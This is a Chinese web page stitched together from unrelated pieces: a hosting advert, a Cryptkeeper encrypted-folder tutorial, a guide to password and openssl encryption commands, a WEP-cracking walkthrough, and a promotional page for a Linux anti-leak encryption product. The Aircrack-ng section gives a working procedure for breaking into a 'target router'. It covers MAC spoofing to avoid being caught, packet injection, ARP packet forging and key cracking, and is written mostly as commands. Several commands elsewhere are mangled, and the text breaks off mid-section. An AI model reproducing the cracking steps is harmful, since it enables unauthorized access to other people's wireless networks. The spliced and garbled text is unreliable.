新网创想网站建设,新征程启航
为企业提供网站建设、域名注册、服务器等服务
假设您的Linux主目录中有一个文件夹,您可以在其中存储您不希望任何人在没有密码的情况下访问的安全文档文件。这样,即使有人设法占用您的计算机并访问您的主目录,您的私人文件仍然有另一道防线。
成都创新互联成立于2013年,是专业互联网技术服务公司,拥有项目做网站、成都做网站网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元祁门做网站,已为上家服务,为祁门各地企业和个人服务,联系电话:13518219792
Cryptkeeper是一个管理加密文件夹的Linux系统托盘小程序。在它下面,EncFS是一个基于FUSE的加密文件系统,它处理透明的加密/解密。
在本教程中,我将介绍如何使用Cryptkeeper密码保护Linux上的文件夹。
在Fedora中安装Cryptkeeper
您可以从Fedora的基础存储库安装Cryptkeeper:
$ sudo yum install cryptkeeper
安装完成后,转到“应用程序” - “系统工具” - “Cryptkeeper”启动Cryptkeeper。
Cryptkeeper指示灯将显示在右上角的桌面面板中。单击指示器,然后选择“新加密文件夹”以创建新的加密文件夹。
选择要保护密码的文件夹的名称及其位置。
输入新加密文件夹的密码。单击“转发”按钮后,它将创建一个新的加密文件夹。
要访问加密文件夹,您需要先打开它。要打开现有的加密文件夹,请单击Cryptkeeper指示器,然后单击文件夹名称。系统将提示您输入密码。文件夹打开后,您可以自由访问其中的内容。要再次使用密码保护文件夹,只需单击Cryptkeeper指示器中的文件夹名称即可关闭该文件夹。
如果要将Cryptkeeper指示器设置为在桌面上自动启动,请选择“设置”下的“会话和启动”菜单。
在“Application Autostart”选项卡下添加Cryptkeeper。
在Ubuntu,Debian或Linux Mint中安装Cryptkeeper
要在基于Debian的Linux上安装Cryptkeeper,请使用apt-get命令。
$ sudo apt-get install cryptkeeper
在Ubuntu上,您可以通过Unity
Dash启动Cryptkeeper。在Debian或Linux Mint上,转到“Applications” - “System
Tools” - “Cryptkeeper”以启动Cryptkeeper。
注意:在最新版本的Ubuntu桌面(例如,12.04,12.10和13.04)上,由于系统托盘的新白名单消除策略,Cryptkeeper指示符不会显示在Unity的顶部面板通知区域中。要解决此问题,请首先获取“systray-whitelist”值,然后将“Cryptkeeper”附加到现有白名单,如下所示。
$ gsettings get com.canonical.Unity.Panelsystray-whitelist
['JavaEmbeddedFrame','Wine','Update-notifier']
$ gsettings set com.canonical.Unity.Panel
systray-whitelist“['JavaEmbeddedFrame','Wine','Update-notifier','Cryptkeeper']”
如果您希望Cryptkeeper指示灯永久显示在您的Ubuntu桌面上,请通过Dash启动“启动应用程序”菜单,并将Cryptkeeper添加为启动程序。
转自 嘉为教育-rhce认证_rhce培训_linux培训_linux认证_linux考证
1. 使用命令 pwgen 来生成一个长度为 10 个字符的独特的随机密码。假如你还没有安装 pwgen,请使用 Apt 或 YUM 等包管理器来安装它。
$ pwgen 101
生成一个独特的随机密码
一口气生成若干组长度为 50 个字符的唯一的随机密码!
$ pwgen 50
生成多组随机密码
2. 你还可以使用 makepasswd 来每次生成一个给定长度的独特的随机密码。在你把玩 makepasswd 命令之前,请确保你已经安装了它。如若没有安装它,试试使用 Apt 或 YUM 包管理器来安装 makepasswd这个软件包。
生成一个长度为 10 个字符的随机密码。该命令产生的密码的长度默认为 10。
$ makepasswd
使用 makepasswd 生成独特的密码
生成一个长度为 50 个字符的随机密码。
$ makepasswd --char50
生成长度为 50 的密码
生成 7 个长度为 20 个字符的随机密码。
$ makepasswd --char20--count 7
3. 使用带“盐”的 Crypt(注:这里应该指的是一个函数,可以参考这里 ) 来加密一个密码。提供手动或自动添加 “盐”。
对于那些不清楚 盐 的意义的人,这里的 “盐” 指的是一个随机数据,它作为密码生成函数的一个额外的输入, 目的是保护密码免受词典攻击。
在执行下面的操作前,请确保你已经安装了 mkpasswd。
下面的命令将带 “盐” 加密一个密码。“盐” 的值是随机自动生成的。所以每次你运行下面的命令时,都将产生不同的输出,因为它每次接受了随机取值的 “盐”。
$ mkpasswd tecmint
使用 Crypt 来加密密码
现在让我们来手动定义 “盐” 的值。每次它将产生相同的结果。请注意你可以输入任何你想输入的值来作为 “盐” 的值。
$ mkpasswd tecmint -s tt
带“盐”加密密码
另外, mkpasswd 还是交互式的,假如你在命令中没有提供密码,它将主动询问你来输入密码。
4. 使用 aes-256-cbc 加密算法并使用带“盐”的密码(如 “tecmint”) 加密一个字符串(如 “Tecmint-is-a-Linux-Community”)。
# echo Tecmint-is-a-Linux-Community | openssl enc -aes-256-cbc -a -salt -pass pass:tecmint
在 Linux 中加密一个字符串
在上面例子中, echo 命令的输出通过管道传递给了 openssl 命令,使得该输出通过加密编码方式(enc:Encoding with Cipher ) 所加密,这个过程中使用了 aes-256-cbc 加密算法,并附带了密码 (tecmint) 和 “盐” 。
5. 使用 openssl 命令的 -aes-256-cbc 解密选项来解密上面的字符串。
# echo U2FsdGVkX18Zgoc+dfAdpIK58JbcEYFdJBPMINU91DKPeVVrU2k9oXWsgpvpdO/Z | openssl enc -aes-256-cbc -a -d -salt -pass pass:tecmint
在 Linux 中解密字符串
现在就是这些内容了。
Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows 从Linux 了,另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族,有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows 只是在后来加入了网络的功能。 Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个: airmon-ng 处理网卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 发包,干扰 另外还要用到以下 linux 命令: ifconfig 查看修改网卡状态和参数 macchanger 伪造 MAC iwconfig 主要针对无线网卡的工具 (同 ifconfig) iwlist 获取无线网络的更详细信息 另外还有其他的 linux 基本命令,我就不提示了。 具体破解步骤: 1. 修改无线网卡状态:先 dow 2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡 4. 修改无线网卡状态: up 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标 6. 监听抓包:生成 .cap 或 .ivs 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等 ifconfig -a ifconfig -a ath0 up airmon-ng start wifi0 6 airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1 airodump-ng ath1 aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1 ----------- -2 Crack Mode----------- aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1 ----------- -3 Crack Mode----------- aireplay-ng -3 -b 目标MAC -h 本机MAC ath1 ----------- -4 Crack Mode----------- aireplay-ng -4 -b 目标MAC -h 本机MAC ath1 packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 ----------- -5 Crack Mode----------- aireplay-ng -5 -b 目标MAC -h 本机MAC ath1 packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 -----------Crack Key----------- aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs —————————————————————————————— 下面详细介绍一下各个命令的基本用法(参照命令的英文说明) 1. ifconfig 用来配置网卡,我们这里主要用来 禁用和启用 网卡: ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是为了下一步修改 MAC 。 2.macchanger 用来改变网卡的 MAC 地址,具体用法如下: usage: macchanger [options] device -h 显示帮助 -V 显示版本 -s 显示当前MAC -e 不改变mac,使用硬件厂商写入的MAC -a 自动生成一个同类型的MAC,同厂商的 -A 自动生成一个不同类型的MAC,不同厂商的 -r 生成任意MAC -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品 -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 启动无线网卡进入 Monitor 模式, useage: airmon-ng startstopcheck interface [channel] startstopcheck启动,停止,检测 interface指定无线网卡 [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了 4.iwconfig 专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。 useage:iwconfig interface [options] [essid{NNONOFF}] 指定essid号 开启关闭 [nwid{NNonoff}] 指定网络id号 开启关闭 [mode {managedad-hoc....}] 指定无线网络工作模式/类型 [freq N.NNNN[KMG]] 指定工作频率 [channel N] 指定频道 [ap {Noffauto}] 指定AP号 关闭/自动 [sens N] sens 号 [nick N] nick 号 [rate {Nautofixed}] 速率控制 [rts {Nautofixedoff}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了 [frag {Nautofixedoff}] 碎片控制 [enc {NNNN-NNNNoff}] 范围 [power {period Ntimeout N}] 电源 频率/超时 [retry {limit Nlifetime N}] 重试 限次/超时 [txpower N{mwdBm}] 功率 毫瓦/分贝 [commit] 处理 5.iwlist 主要用来显示无线网卡的一些附加信息,同上 useage: iwlist [interface] options scanning 扫描 frequency 频率 channel 频道 bitrate 速率 rate 速率 encryption 加密 key 密钥 power 电源 txpower 功率 ap ap accespoints ap peers 直连 event 事件 6.airodump-ng 抓包工具,我最喜欢用的,详细用法如下: usage: airodump-ng options interface[,interface,...] Options: --ivs :仅将抓取信息保存为 .ivs --gpsd :使用 GPSd --write prefix :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分 -w :同 --write --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的 --update secs :显示更新延迟,没有用过 --showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了 -h :隐藏已知的,配合上面的选项使用 -f msecs :跳频时间 --berlin secs :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注) -r file :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵 Filter options: --encrypt suite : 使用密码序列过滤 AP --netmask netmask : 使用掩码过滤 AP --bssid bssid : 使用 bssid 过滤 AP -a : 过滤无关的客户端 默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作: --channel channels:指定频道 --band abg :制定带宽 -C frequencies :指定频率MHz --cswitch method : 设置频道交换方式 0 : FIFO (default) 先进先出(默认) 1 : Round Robin 循环 2 : Hop on last 最后一跳 -s : 同上 --help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文 7.aireplay-ng
合力天下LINUX防泄密系统概述
Linux具有天生秉承的优势,越来越多的企业转向了Linux的开发和应用。使用Linux操作系统的单位多数都拥有自主知识产权,如果有丝毫的泄露,都会造成巨大的损失。 基于多年的数据防泄漏防护经验,北京合力天下数码信息技术有限公司自主研发了一套运行在Linux平台环境下,防止Linux系统中自主知识产权泄密的产品。该系统在不改变用户使用习惯、计算机文件格式和编译程序的情况下,对指定类型的代码文件进行实时、透明的加解密。所有通过非法途径获得的数据,都将以乱码文件形式表现。
合力天下LINUX防泄密系统是一款功能强大且易于使用的LINUX文档加密软件产品,该系统采用“驱动层AES智能透明加密技术”对指定类型的文件进行实时、强制、透明的加解密。在正常使用时,计算机内存中的文件是以受保护的明文形式存放,但硬盘上保存的数据却处于加密状态,如果没有合法的使用身份、访问权限和正确的安全通道,所有加密文件都将以密文状态保存。
合力天下LINUX防泄密系统稳定可靠,并且具备良好的可扩展性,能同时满足企业其它应用系统文档加密需求,有效防止数据丢失或泄露,有助于更深入、更全面地实施数据保护,从而确保企业机密数据的高度安全。
合力天下LINUX防泄密系统产品架构
合力天下LINUX防泄密系统采用控制台/服务器/代理(B/S/C)体系:服务器(Server)、客户端代理(Agent)和控制台(Management Console)三部分组成。
M/S/A三部分相互协调工作:管理员通过控制台的WEB浏览器制订灵活的安全策略;安全策略被保存在服务器上;终端计算机上安装的代理主动连接服务器;接收到网络连接后,服务器把制订好的策略下发到该终端计算机;终端计算机代理的安全引擎执行安全策略,进行安全控制。
合力天下LINUX防泄密系统部署模式
合力天下LINUX防泄密系统功能特点
一 驱动层透明加密
针对研发单位,可对JAVA、C、C++ 等各种源代码文件进行透明加密保护;
针对手机、电子书等版权单位,可针对任何需要保护其版权的文档类型进行透明加密保护;
针对办公环境,可对任何文件类型加密。
二 编译加密源代码
针对研发单位,加密的源代码文档无需解密为明文,可直接通过编译进程进行编译。
编译后的Image文件是明文,便于产品的测试与分发。
三 网络通信安全隧道
加密文档(如源代码)需要通过文档版本管理软件(如CVS\SVN\GIT)通过网络或文件系统进行集中备份与共享。加密文件系统提供网络安全隧道功能,保护网络通信中的加密文件。
如加密文件需要保存到服务器上,既可以密文存储到服务器上也可以明文存储到服务器上。
如明文存储到服务器上,加密系统的网络安全隧道可与合力天下LINUX防泄密系统服务器数据保护网关联动,实现加密文档在上传到服务器网关自动解密,下载文件时网关自动加密。如此既保障了文档的可靠性、可用性,又保障文档的安全性。
四 进程合法性验证
对进程进行签名认证,验证通过的进程,才是合法进程,才能对加密文件行读写操作。
任何伪造进程的方式都无法读写加密文档。如更改进程名称、SVN多种协议读写加密文件等都无法解密文件。
五 自身安全强保护
系统具有自我保护能力,在自身受到破坏不完整时整个系统依然能够保障数据的安全性。
粘贴/拷贝控制
系统具有防粘贴拷贝能力,不可信进程可以拷贝任何数据到可信进程;但可信进程不允许拷贝数据到任何其它进程,有效防止数据的泄露。
六 文件批量加密
可对明文文件批量加密,针对开源的文件很方便的合并到工程里面。
批量加密流程具有保护机制,防止已经加密的文件再次加密,造成文件的损坏。
七 可离线工作
离线即客户端网络连接不上加密服务器所处的状态,如外出办公等。
加密系统支持离线办公,离线的安全策略为最近一次在线时的文件加密策略。
八 与Windows加密系统兼容
Linux加密系统与Windows加密系统相互兼容:Windows加密的文件在Linux下能够操作,在Linux加密的文件在Windows下能够操作。
合力天下linux防泄密系统加密规则
1.不可信进程规则
不可信进程创建、编辑的文件都是明文文件。
不可信进程读取的加密文件是乱码,不可以使用。
2.可信进程规则
可信进程创建符合加密规则的文件是加密的文件。
可信进程可以透明读写编辑加密文件。
原不加密但符合加密规则文件,一但可信进程进行了编辑,则原文件成为加密文件。
可信进程在未创建、读写加密文件前,创建不符合加密规则的文件是明文的。
可信进程在未创建、读写加密文件前,可以任意编辑明文文件,该文件不被加密。
可信进程一旦创建、编辑了加密文件,则后续创建、编辑的所有文件都是加密的。
3.进程间拷贝粘贴规则
可以自由的从不可信进程中粘贴拷贝文字到可信进程。
可以自由的从不可信进程中粘贴拷贝文字到不可信进程。
可信进程的文字拷贝受到安全保护,禁止随意拷贝文字。
4.编译器进程规则
编译器创建的二进制文件是明文的,可以随意烧到嵌入式设备中。
5.离线加密规则
支持离线文档加密。
离线规则为最近一次上线的文档加密规则。
6.文件批量加密
支持文件批量代码加密转化。
已经加密的文件不会被二次加密。
合力天下LINUX防泄密系统功能表